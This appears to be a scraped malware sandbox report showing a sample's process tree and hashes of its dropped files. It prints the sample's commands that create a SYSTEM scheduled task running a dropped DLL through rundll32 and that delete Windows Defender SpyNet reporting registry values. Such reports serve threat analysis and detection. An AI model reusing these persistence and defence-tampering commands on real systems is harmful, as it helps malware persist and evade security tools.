- Creates scheduled task(s)
PID:1184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PEfpnAabivfJAexgy" /SC once /ST 07:40:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PEfpnAabivfJAexgy"3⤵PID:1436
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1120
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CXoLteMjLNFiDzwgz"3⤵PID:1632
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll",#1 /site_id 5254032⤵PID:592
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rxGmlNEdrxIyNebK\VipEfLrZ\CSmXDoi.dll",#1 /site_id 5254033⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1936
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1532
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-644474614206127381344062763-648645217-1957303675-1514247783-44155891160988584"1⤵
- Windows security bypass
PID:572
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1724
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD508f4bfef4a1f29c064c97a5ac593ee5f
SHA154ddefeddba3de7d7ff9087339e558bd65a44f43
SHA256b1e7f3a0f79df501c01f7103c3f25e1044cd27e0a713d72c2503a718a5c7bc38
SHA51209bb9388e8641eee01b1f7335d89337ed8b09a8d9aaf7d7fae32c1cf743daf99b446acdd6078425c0a07d49298347b438857e9b24b351a1a04220ea0a2d79fa8
-
Filesize
2KB
MD5d0b514d61576638c5b7d2952a8faf1a9
SHA15efd173545a68a47e8e2af27e7c044283871a1b2
SHA256f534e91113b4c72bd9d39945c178961b49c903bed3ce60c8ff96c51d1ecea8f2
SHA512338e828fad205dda033465d168c2ea73889069af60517d62a407efdd5c3446ac87f0be715da177463c7d51179e606588be189ce4f98969b9414c9f00a8604268
-
Filesize
2KB
MD5117d3d24fc7e8711b6cb476df6bc39b2
SHA12b2d835059a984ff6739904d2c5a91f2adedb976
SHA256460b4f8d8b01a0f8261c24df87b52ee6a5762f7bb5a4f352c6af13e7d453c617
SHA512bf29d250c72cbbc3ac6f80ee9aaa8fa7ad6a1e35cbc95734353a57ea877af41604aad7057fdbd4c80ee93b78fbc61d63b6b104d465fb4d9fd1cc006b9c5b3e22
-
Filesize
2KB
MD55648066c06071aeb2f8e64c10164c963
SHA15702fcf3927e54ee95868ee82018d2efa4d43351
SHA25610eb59334766f312caa2c708c50209d926d5fbe6abea42d55f12c5a04cda4235
SHA5126199232bd8df8c9db801f26a139d5c009c3536f4247e15989104e6e85ea1be7249119e3d713ca36e341252c5984d6bf60f3168d62c84d5b8913a3ce01d61a07d
-
Filesize
2KB
MD519b4f8bd48b2d667b19710c728fcb149
SHA1e80a8d90f56af023108dd8074c96670ebfc6c987
SHA256f3e8e6aeea8dbd438abfae65f8a14a3baa7ea6cac06911bca81840c76736db75
SHA512e004f99a7b1fbe0590f9ce6a58accf1906469342bc0b48baf001642abc8392c841887d9cb011995c7dab07a34d8a845507fea51dad2f661f57d2231a3811cbc3
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD519b09651704b2873502c90ea3a6422df
SHA1d7b5fc333eb3e7dfd0a5d754f98272f8c4b2666a
SHA2568c773d18b25bbbc9ca07f21588988d2e26cd990867d5822b7f5deb6fa9c8ed18
SHA51253d90501a272dd1668ebc5196b466cdc3bf13dd50629f0870d75580375d6965b1e7f86bc75cf255420f9e5f3a05c8ec32bd3e20a3ba257fa8a04f7758ea11e5d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e1d7c38a0317750cf9037b87e00cfa91
SHA14bc9659e4ccbbc608a8193057a6cff404cf8587f
SHA2563ce947d29213650a64a9d9c9dd820e26ada6b95f148cbc99c3e60f54ec3eaf57
SHA512aedb7bff76079f0c30227a96161d7ab3a0419ee39a848e597af5ad713581c4aacabfef8983f295de023de5f171284fd1eb3f220deffc9e199bf2ceedfa35f4f2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f819c1ece21e2830f75cdb9e6a811984
SHA12a8839e72ece5f11cf6e7659f444e79643cf621d
SHA2565132131c012f4a99c1cbce2a8b5d61654b36254040dce99c814f1bab894fb1fd
SHA5126951747c5a9e79a88b438fb761a9cf37febf302e2b8b1b0a732f6f1e254f478aa6c8195f27e166d08a5236a0d239810ebda4e3b17d1d33c4828e0faf39b2cc50
-
Filesize
8KB
MD57c03ddbaaf1c07817211757713e7c241
SHA1b11878f030ef5f5c139084ef25070d840726654e
SHA2563de982f438f193f6201783200684bf940d6f6dba213acafdae87d8a5d165f6fa
SHA5122f10adce000ecba4ea7bee5c789585f57f172156ce12b074300e1fefd0c5497c542d6224097046c8881562bcbaaf4ab528a30e57b62b12cf3d75178c8f5d139b
-
Filesize
6.2MB
MD5f23ad98dfcc8665746d130fe0722d760
SHA102e0f055fbd0f2df41962dbc65dd93008aa6dd5e
SHA2560f846a836a2124bab0b29eaa2ac444a4c4dcd990012e53534b1870290e1586cb
SHA51215b323db25ca2d911cadba5031c52f1b977a84bfc463cfd17e43886cad9f801570f49f6dc22c32eff1cf0eb6f7aedbb05be7031e06a3a0398d8a137d1cc0dd5d
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
5KB
MD5c9bede2e3be3daa318c6e3d416d04830
SHA16e8c6ce8a25b582a19a81f19e0366fc9ecb1952b
SHA2566e93323819b9cc82fffc5f3f9b0cb951c8d8109e8d388d2b43f9dc3ffbd54dad
SHA512bd2d8e526f2ad914b45f774bb52061c25badf9571ed70e7fe95f31b93f8e9a0f4c1011a4398e1a8b9b4a9bcd41266e779d6492cb62d858100196b5e061be9c58
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.8MB
MD58f199e8535d9227c9f5d85804a61be5d
SHA172ac21d85111e543920b2b5a43ff960e29f0a273
SHA2563929e7a189c168e423000ec4538a325a892895f5636193828b204f97e9e4a694
SHA512ee82d24ae9ac9196d85d8c59f3e2974800bd86f91702573ffa50fdfc42a9786661dbc4404aa4d11fa0519de5cdacd4c6ff673734d06c17f146049a3c86670a32
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.3MB
MD56fdc3e05e9f27e9444f490acec9d864e
SHA1722c69c69e3b735ca73f1c0ff782477e12f22102
SHA2563b635eff54e547235286631f911b4a84587436f2eeabda9d76f243836a8cc068
SHA5127a6dbef19647dbbbc1bd180473172543761c331419f522d09e6407c25d0ec5dc13de7bc11175c02503fc763ea838b5586f4a610677bacfabbb05f4c68275cefd
-
Filesize
6.2MB
MD5f23ad98dfcc8665746d130fe0722d760
SHA102e0f055fbd0f2df41962dbc65dd93008aa6dd5e
SHA2560f846a836a2124bab0b29eaa2ac444a4c4dcd990012e53534b1870290e1586cb
SHA51215b323db25ca2d911cadba5031c52f1b977a84bfc463cfd17e43886cad9f801570f49f6dc22c32eff1cf0eb6f7aedbb05be7031e06a3a0398d8a137d1cc0dd5d
-
Filesize
6.2MB
MD5f23ad98dfcc8665746d130fe0722d760
SHA102e0f055fbd0f2df41962dbc65dd93008aa6dd5e
SHA2560f846a836a2124bab0b29eaa2ac444a4c4dcd990012e53534b1870290e1586cb
SHA51215b323db25ca2d911cadba5031c52f1b977a84bfc463cfd17e43886cad9f801570f49f6dc22c32eff1cf0eb6f7aedbb05be7031e06a3a0398d8a137d1cc0dd5d
-
Filesize
6.2MB
MD5f23ad98dfcc8665746d130fe0722d760
SHA102e0f055fbd0f2df41962dbc65dd93008aa6dd5e
SHA2560f846a836a2124bab0b29eaa2ac444a4c4dcd990012e53534b1870290e1586cb
SHA51215b323db25ca2d911cadba5031c52f1b977a84bfc463cfd17e43886cad9f801570f49f6dc22c32eff1cf0eb6f7aedbb05be7031e06a3a0398d8a137d1cc0dd5d
-
Filesize
6.2MB
MD5f23ad98dfcc8665746d130fe0722d760
SHA102e0f055fbd0f2df41962dbc65dd93008aa6dd5e
SHA2560f846a836a2124bab0b29eaa2ac444a4c4dcd990012e53534b1870290e1586cb
SHA51215b323db25ca2d911cadba5031c52f1b977a84bfc463cfd17e43886cad9f801570f49f6dc22c32eff1cf0eb6f7aedbb05be7031e06a3a0398d8a137d1cc0dd5d